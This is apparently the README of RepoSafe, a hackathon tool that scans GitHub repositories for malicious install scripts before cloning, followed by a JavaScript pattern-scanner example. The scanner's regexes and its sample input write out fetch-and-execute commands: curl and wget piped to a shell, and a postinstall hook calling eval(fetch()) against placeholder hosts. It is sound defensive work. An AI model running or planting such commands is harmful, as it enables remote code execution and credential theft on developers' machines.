AI-powered GitHub repository security scanner.
Know if a repo will attack your machine before you run a single command.
See a live demonstration on YouTube: https://youtu.be/lONES6cl9dQ
Every developer workflow looks like this:
Find repository → git clone → open project
There is no safety check between those steps.
Malicious repositories can hide dangerous behavior in places developers rarely inspect:
- `package.json` install scripts
- `Makefile` commands
- `.mcp.json` configurations
- `.env` examples
- install instructions in README
- GitHub Actions workflows
These scripts can:
- execute shell commands
- download malicious binaries
- exfiltrate API keys
- steal environment variables
Most security tools work after you've already cloned and executed code.
RepoSafe adds a security check before the clone.
Paste any GitHub repository URL.
RepoSafe automatically:
- `package.json`
- `.mcp.json`
- `Makefile`
- `README.md`
- `install.sh`
- GitHub workflows
Detects patterns like:
- `curl | bash`
- postinstall scripts
- credential exfiltration
- remote code execution
- MCP server overrides
Using the GitHub API:
- repository age
- star velocity
- contributor history
- suspicious forks
Example warning:
Account created 3 days ago
847 stars gained overnight
An AI security agent analyzes:
- install instructions
- configuration files
- detected patterns
- repository metadata
and produces:
- Trust Score (0-100)
- Verdict
- Plain-English explanation
⚠️ CLONE WITH CAUTION
Trust Score: 60/100
Findings:
🔴 Could potentially expose the application to API abuse or data leaks.
🟡 Absence of 'package.json' and limited GitHub metadata might indicate poor security practices.
🚨 DO NOT CLONE
Trust Score: 10/100
Findings:
🔴 high-severity curl-pipe-bash commands and malicious postinstall scripts.
🔴 'package.json' contains a postinstall script that could install arbitrary code from an untrusted source
🔴 '.mcp.json' file contains an override of the MCP server URL to a suspicious host.
🔴 'README.md' document and 'install.sh' script both contain curl-pipe-bash commands that could execute malicious payloads.
Safe repositories receive:
✅ SAFE TO CLONE
| Layer | Technology |
|---|---|
| Frontend | Next.js 14 + React |
| API | Next.js Server Routes |
| AI Analysis | Groq API (Llama 3.1) |
| Data Source | GitHub REST API |
| Deployment | Vercel |
Total cost:
$0
```bash
git clone https://github.com/shivamgravity/reposafe.git
cd reposafe
npm install
```

Create:
.env.local
Example:
```
GROQ_API_KEY=your_groq_api_key
GITHUB_TOKEN=optional_github_token
```
Where to get keys:
Groq API
https://console.groq.com/keys
GitHub Token
https://github.com/settings/tokens
```bash
npm run dev
```

Open:
http://localhost:3000
Try scanning:
Safe repo:
https://github.com/golang/go
Suspicious demo repo:
https://github.com/shivamgravity/reposafe-demo-malicious
1️⃣ Push the project to GitHub

```bash
git add .
git commit -m "RepoSafe"
git push
```

2️⃣ Go to:
https://vercel.com
3️⃣ Import your repository and add environment variables:
GROQ_API_KEY
GITHUB_TOKEN
4️⃣ Deploy
```
reposafe
│
├── app
│   ├── page.jsx
│   ├── layout.js
│   ├── icon.ico
│   └── api
│       └── scan
│           └── route.js
│
├── public
│   └── banner.png
│
├── images
│   ├── Dangerous.png
│   ├── caution.png
│   └── safe.png
│
├── package.json
├── .gitignore
├── package-lock.json
├── .env.local.example
└── README.md
```
RepoSafe combines multiple analysis layers.
Detects patterns like:
- `curl | bash`
- `wget | sh`
- postinstall scripts
- `eval(fetch())`

Flags suspicious signals:
- brand new account
- unusual star velocity
- low contributor count
An AI model analyzes:
- install instructions
- suspicious scripts
- configuration files
to produce human-readable explanations.
RepoSafe does not execute repository code.
All analysis is performed through:
- GitHub API
- static file inspection
- AI reasoning
This ensures scanning itself is safe.
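
A sketch of the static file inspection described above, as an added example that is not RepoSafe's own code. The regexes, the hook list, the function names and the sample file contents are assumptions made for illustration; files are only parsed and matched as text, never executed.

```javascript
// Added example: pattern scan over file contents already fetched as text.
// Rule ids and regexes are illustrative assumptions, not RepoSafe's rules.
const SHELL_RULES = [
  { id: "curl-pipe-shell", re: /\bcurl\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/ },
  { id: "wget-pipe-shell", re: /\bwget\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/ },
  { id: "eval-fetch", re: /\beval\s*\(\s*(?:await\s+)?fetch\s*\(/ },
];
// npm lifecycle scripts that run automatically on `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Match every rule against every line and report 1-based line numbers.
function scanText(path, text) {
  const findings = [];
  text.split("\n").forEach((line, i) => {
    for (const rule of SHELL_RULES) {
      if (rule.re.test(line)) findings.push({ path, line: i + 1, rule: rule.id });
    }
  });
  return findings;
}

// Parse package.json as data; flag install-time hooks and scan their commands.
function scanPackageJson(path, text) {
  let pkg;
  try { pkg = JSON.parse(text); }
  catch { return [{ path, line: 0, rule: "unparseable-package-json" }]; }
  const scripts = (pkg && typeof pkg.scripts === "object" && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    findings.push({ path, line: 0, rule: `lifecycle-script:${hook}` });
    findings.push(...scanText(`${path}#scripts.${hook}`, scripts[hook]));
  }
  return findings;
}

function scanRepo(files) {
  return Object.entries(files).flatMap(([path, text]) =>
    path.endsWith("package.json") ? scanPackageJson(path, text) : scanText(path, text));
}

// Constructed sample input; hosts use the reserved .example TLD.
const SAMPLE = {
  "README.md": "# Setup\n\ncurl -fsSL https://install.example/setup.sh | bash\n",
  "install.sh": "#!/bin/sh\nwget -qO- https://install.example/x | sudo sh\n",
  "package.json": JSON.stringify({ scripts: { test: "jest",
    postinstall: "node -e \"eval(fetch('https://cdn.example/p'))\"" } }),
  "Makefile": "build:\n\tgo build ./...\n",
};
console.log(scanRepo(SAMPLE));
```

Regex rules of this kind miss obfuscated or multi-line commands, which is one reason to treat a clean result as the absence of known patterns rather than proof of safety.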
Global Engineering Hackathon
Themes:
AI
Developer Tools
Security Automation
Open-source development relies on trust.
RepoSafe adds a 10-second security check before developers clone unknown code.
A simple step that can prevent credential theft, malware, and supply-chain attacks.




